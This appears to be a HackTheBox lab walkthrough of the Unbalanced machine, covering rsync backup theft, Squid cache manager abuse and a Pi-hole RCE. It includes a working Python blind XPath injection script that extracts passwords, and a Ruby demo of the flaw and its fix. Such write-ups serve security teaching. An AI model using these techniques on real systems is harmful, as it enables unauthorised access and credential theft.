22. HackTheBox. Level Hard: Unbalanced walkthrough. Rsync, EncFS, Squid, XPath injection and RCE in Pi-hole

24 December 2024 5 minutes Author: Lady Liberty

We look at how professional security testers and attackers find and exploit vulnerabilities in systems. Using the Unbalanced virtual machine from the HackTheBox platform, we walk through the attack step by step so that you understand how these techniques work and how to protect your own systems.

Walkthrough of Unbalanced

We continue publishing walkthroughs of machines from the HackTheBox platform. This article covers pulling backups over rsync, brute-forcing an EncFS password, working with the Squid proxy and its cache manager, exploiting a blind XPath injection, and using an RCE in Pi-hole.

Recon

The machine's IP address is 10.10.10.200; add it to /etc/hosts.

10.10.10.200 	unbalanced.htb

First, the open ports are scanned. This is done with a script that takes one argument, the address of the host being analysed:

#!/bin/bash
# Takes one argument: the target host.
# Pass 1: fast scan of all 65535 TCP ports, keeping only the port numbers.
# Pass 2: service/version detection (-A) on just those ports.
ports=$(nmap -p- --min-rate=500 "$1" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p"$ports" -A "$1"

The scan detected SSH, rsync, and squid proxy services. Rsync is a program for UNIX-like systems that synchronizes files and directories in two locations with minimal bandwidth usage. It allows you to copy or list the contents of directories, and copy files with compression and recursion options.

Next, list the modules the rsync daemon exposes.

rsync --list-only rsync://unbalanced.htb:873

Copy the conf_backups module locally.

rsync -av rsync://unbalanced.htb:873/conf_backups conf_backups

The presence of a .encfs6.xml file tells us this is an EncFS encrypted volume. The next step is to extract a crackable password hash from that file.

Let's brute-force it.

This gives us the password used to encrypt the volume. All that remains is to mount it.

Once mounted, we get the plaintext file listing.

These are mostly configuration files, and the most interesting one is squid.conf. Let's look at the uncommented lines only.

grep -v '^#' squid.conf | uniq

We note the cache manager password found in the configuration and add the new domain name to /etc/hosts. The ACL lines are kept for further analysis.

10.10.10.200    intranet.unbalanced.htb

Let's configure the Squid proxy (10.10.10.200:3128) in the browser and open the web server under the domain name we found.

A login form appears. After spending some time on it without result, we return to Squid itself for further research.

Entry Point

Let's look at the cache manager reports the password gives us access to (-w passes the cachemgr password).

squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:menu | grep -v 'disabled'

The fqdncache report reveals more host names.

squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache

There are three more names. Let's add them to /etc/hosts (the last entry is an inference, not a cache hit: hosts 2 and 3 appear in the cache, so the main intranet server is presumably host 1).

172.31.179.2    intranet-host2.unbalanced.htb
172.31.179.3    intranet-host3.unbalanced.htb
172.31.179.1    intranet.unbalanced.htb

At first glance we see that this site is a temporary solution.

Next, we come to the same login form.

USER

We probe it again and find that the form responds differently to the payload ' or ''=' (submitted in both fields), which indicates an injection.

The injection is XPath: with that payload the page returns the list of users. With crafted conditions, the password for each user name can be recovered as well.

First, the password length is determined with the string-length() function. A known account is used for testing: its password is 5 characters long, so the conditions for length 4 and length 5 are submitted to see how the responses differ.

The difference is clear. Once the length is known, the password can be recovered one character at a time with substring(). Again the test account is used: the first character is compared with a, then with b.

The difference is clear here too. The next step is to write code that automates the extraction for every user name.

import requests
import string

# The intranet host is only reachable through the Squid proxy on the target.
url = 'http://172.31.179.1/intranet.php'
proxies = {'http': 'http://10.10.10.200:3128'}
users = ['bryan', 'sarah', 'jim', 'rita']

# Both payloads go into the Password field; the application adds the closing quote,
# so the predicate becomes: [Username='' and Password='' or Username='USER' and <cond>]
pass_str_len = "' or Username='USER' and string-length(Password)='"
pass_str_chr = "' or Username='USER' and substring(Password,NUM,1)='"

# string.printable[:94] is digits, letters and punctuation (no whitespace).
# The single quote is dropped because it would break the injected literal.
charset = string.printable[:94].replace("'", '')


def oracle(payload):
    """True when the injected condition selects a user (no 'Invalid credentials.')."""
    data = {'Username': '', 'Password': payload}
    r = requests.post(url=url, data=data, proxies=proxies)
    return 'Invalid credentials.' not in r.text


for user in users:
    for l in range(1, 25):
        print('(' + str(l) + ') ' + user + ' : ' + ' ' * 10, end='\r')
        if oracle(pass_str_len.replace('USER', user) + str(l)):
            passwd = ''
            for num in range(l):
                for c in charset:
                    print('(' + str(l) + ') ' + user + ' : ' + passwd + c + ' ' * 10, end='\r')
                    if oracle(pass_str_chr.replace('USER', user).replace('NUM', str(num + 1)) + c):
                        passwd += c
                        break
            print(user + ' : ' + passwd + ' ' * 10)
            break
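To show what the script above is actually exercising on the server side, here is an added example that is not code from the walkthrough or from the Unbalanced intranet. It is a Ruby script using REXML's XPath engine over a constructed user store (the names and passwords in it are invented, not the machine's). It reproduces the vulnerable query pattern, confirms the ' or ''=' bypass, runs the same string-length()/substring() oracle as the Python script, and shows the fix: the XPath expression stays fixed and user input is only ever compared in code.

```ruby
require 'rexml/document'

# Constructed stand-in for the intranet's user store; not the machine's data.
USERS_XML = <<~XML
  <Users>
    <User><Username>bryan</Username><Password>secret</Password></User>
    <User><Username>sarah</Username><Password>pa55</Password></User>
  </Users>
XML

def load_users
  REXML::Document.new(USERS_XML)
end

# Vulnerable pattern: both form fields are spliced into the predicate. The
# application supplies the quotes, so a payload only has to close one literal
# and open another, which is why the injections in the article end without a
# closing quote.
def vulnerable_login(doc, username, password)
  query = "//User[Username='#{username}' and Password='#{password}']"
  !REXML::XPath.first(doc, query).nil?
end

# Hardened: the XPath expression contains no user input at all. The candidate
# node is picked in code and the secret compared in length-independent time.
def hardened_login(doc, username, password)
  REXML::XPath.each(doc, '//User') do |user|
    next unless user.elements['Username'].text == username
    return constant_time_equal?(user.elements['Password'].text, password)
  end
  false
end

def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Blind oracle, as in the Python script: empty username, payload in password.
# Resulting predicate: Username='' and Password='' or Username='X' and <cond>
def oracle(doc, payload)
  vulnerable_login(doc, '', payload)
end

# Printable ASCII, lowercase first for speed, minus the single quote that
# would break the injected literal (a limitation the real attack shares).
CHARSET = ([*'a'..'z', *'0'..'9', *'A'..'Z'] + (0x20..0x7e).map(&:chr)).uniq - ["'"]

# Length first via string-length(), then one position at a time via substring().
def extract_password(doc, username, max_len: 30)
  len = (1..max_len).find do |l|
    oracle(doc, "' or Username='#{username}' and string-length(Password)='#{l}")
  end
  return nil unless len
  (1..len).map do |pos|
    CHARSET.find do |c|
      oracle(doc, "' or Username='#{username}' and substring(Password,#{pos},1)='#{c}")
    end || '?'
  end.join
end

if __FILE__ == $PROGRAM_NAME
  doc = load_users
  bypass = "' or ''='"
  puts "vulnerable login with #{bypass}: #{vulnerable_login(doc, bypass, bypass)}"
  puts "hardened login with #{bypass}:   #{hardened_login(doc, bypass, bypass)}"
  %w[bryan sarah].each { |u| puts "#{u} : #{extract_password(doc, u)}" }
end
```

The hardened version still compares plaintext passwords, because that is what the injectable query does; a real fix would store a password hash and verify it with a purpose-built KDF. The point demonstrated is narrower: REXML, like most XPath 1.0 engines, has no bind variables, so the only reliable defence is to keep user input out of the expression entirely rather than trying to escape quotes.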

The first user's recovered password also works for SSH.

ROOT

In the user's home directory we find a TODO list.

We see that the Pi-hole tasks (password: admin) have been completed. We cannot check which ports are listening locally because netstat is not installed, so a script is used instead.
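The script itself is not reproduced on this page. As an added example (not the author's script), the following Ruby program does the same job without netstat: it reads the kernel's socket table from /proc/net/tcp (and /proc/net/tcp6 when present) and prints every socket in the LISTEN state, which is what netstat -lnt would show. The table embedded below is constructed for the example, not output captured from the machine.

```ruby
require 'ipaddr'

# Constructed sample in /proc/net/tcp format; not captured from the machine.
SAMPLE_PROC_NET_TCP = <<~TXT
    sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
     0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1 0000000000000000 100 0 0 10 0
     1: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 1002 1 0000000000000000 100 0 0 10 0
     2: 0100007F:15B1 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1003 1 0000000000000000 100 0 0 10 0
     3: C80A0A0A:0016 640A0A0A:C350 01 00000000:00000000 02:000A1B2C 00000000     0        0 1004 2 0000000000000000 20 4 30 10 -1
TXT

TCP_STATES = {
  '01' => 'ESTABLISHED', '02' => 'SYN_SENT',  '03' => 'SYN_RECV', '04' => 'FIN_WAIT1',
  '05' => 'FIN_WAIT2',   '06' => 'TIME_WAIT', '07' => 'CLOSE',    '08' => 'CLOSE_WAIT',
  '09' => 'LAST_ACK',    '0A' => 'LISTEN',    '0B' => 'CLOSING'
}.freeze

# The kernel prints each 32-bit word of the address in host byte order
# (little-endian on x86), so 127.0.0.1 shows up as 0100007F. Reversing the
# bytes of every 8-hex-digit word gives network order; the same rule covers
# the four words of an IPv6 address in /proc/net/tcp6.
def decode_proc_addr(hex)
  packed = hex.scan(/.{8}/).map { |word| [word].pack('H*').reverse }.join
  IPAddr.new_ntoh(packed).to_s
end

# One hash per socket. Column order in the file:
# sl local_address rem_address st tx:rx tr:when retrnsmt uid timeout inode ...
def parse_proc_net_tcp(text)
  text.lines.drop(1).map do |line|
    f = line.split
    next if f.size < 8
    laddr, lport = f[1].split(':')
    raddr, rport = f[2].split(':')
    {
      local: decode_proc_addr(laddr), lport: lport.hex,
      remote: decode_proc_addr(raddr), rport: rport.hex,
      state: TCP_STATES.fetch(f[3], f[3]), uid: f[7].to_i
    }
  end.compact
end

# [address, port] of every socket in LISTEN state, as netstat -lnt would show.
def listening_ports(text)
  parse_proc_net_tcp(text).select { |s| s[:state] == 'LISTEN' }
                          .map { |s| [s[:local], s[:lport]] }
end

if __FILE__ == $PROGRAM_NAME
  # On a real host read the kernel tables; fall back to the sample elsewhere.
  files = %w[/proc/net/tcp /proc/net/tcp6].select { |p| File.readable?(p) }
  texts = files.empty? ? [SAMPLE_PROC_NET_TCP] : files.map { |p| File.read(p) }
  texts.flat_map { |t| listening_ports(t) }.each { |addr, port| puts "#{addr}:#{port}" }
end
```

The sample contains listeners on 0.0.0.0:22 and on 127.0.0.1:8080 and 127.0.0.1:5553, the loopback-only ports the TODO list points at; a loopback-bound service is exactly the case where a port forward over SSH is needed, as done in the next step.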

Ports 8080 and 5553 are open.

The output also reveals another domain name and its IP address. Next, a port forward is set up over SSH, after which the service is opened in the browser.

ssh -L 8080:127.0.0.1:8080 [email protected]

Open the forwarded page and log in with the password admin.

Let's look at the available exploit for this Pi-hole version.

We start a listener, then run the exploit to obtain a reverse shell.

Browsing root's directory, we find the script mentioned in the TODO list.

The script contains a password.

Conclusion

This article covered the techniques used on the HackTheBox machine: listing and pulling rsync modules, brute-forcing an EncFS password, working with Squid and its cache manager, blind XPath injection, and exploiting an RCE in Pi-hole. Along the way we obtained a list of users, SSH access, a new internal domain and a script containing a password. The chain demonstrates the importance of keeping systems updated and of protecting backups and configuration data.
